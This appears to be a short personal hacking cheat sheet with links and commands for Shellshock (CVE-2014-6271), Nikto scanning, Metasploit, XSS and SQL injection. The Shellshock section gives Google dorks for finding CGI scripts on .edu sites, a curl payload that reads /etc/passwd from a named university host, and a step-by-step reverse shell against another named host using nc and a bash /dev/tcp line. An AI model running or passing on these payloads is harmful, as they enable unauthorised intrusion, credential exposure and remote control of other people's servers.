Hacker

ShellShock (CVE-2014-6271)

•  https://securityblog.redhat.com/2014...ection-attack/
• https://access.redhat.com/solutions/1207723
• http://lists.centos.org/pipermail/ce...er/146099.html
• http://exploiterz.blogspot.tw/2014/0...erability.html
• http://www.boxtricks.com/how-to-scan-for-shellshock/
   

Scanning the target with Google

inurl:cgi-bin filetype:sh site:edu
inurl:/cgi-bin/ ext:sh 

Attempt to get the username remotely

curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/cat /etc/passwd " http://www.physics.csbsju.edu/cgi-bin/stats/dir.sh

Reverse SHELL

> php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c ls
 

if it response as 'Command sent to the server!', continue with the follows

> nc -lp 4444 -vv 

Waiting untill the PHP command is completed.
If all goes well, you can issue any commands here. 

Open another terminal. issue the command

> php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/here.is.my.IP/4444 0>&1"

Hacking a website

• http://www.rapid7.com/products/metas...t/download.jsp
• http://www.offensive-security.com/me...AP_Web_Scanner
• http://www.youtube.com/watch?v=9rKKdmLsKVI
• http://www.youtube.com/watch?v=EYxLtSuzwDM

cd /pentest/web/nikto
perl nikto.pl -host 123.123.123.123 

Metasploit

• Nmap掃描技巧(使用metasploit)：TCP空閒掃描(TCP Idle Scan)

HTTP Method Enabled

• http://www.metasploit.com/modules/au.../http/http_put
• http://www.youtube.com/watch?v=Pb6Nd7Cl5XM
• http://portswigger.net/burp/

XSS - Cross-Site Scripting

• http://www.youtube.com/watch?feature...v=WZCXIrW0xZ0#!
• http://www.hackersonlineclub.com/cro...-scripting-xss
• http://www.youtube.com/watch?v=wzbMU97ed1E
• http://www.crackhackforum.com/thread-221603.html

SQL Injection

• http://resources.infosecinstitute.co...ordpress-site/
• How To Hack a WebSite Using BackTrack 5 {SqlMap}

Asterisk/FreePBX

• http://www.rebootuser.com/?p=1117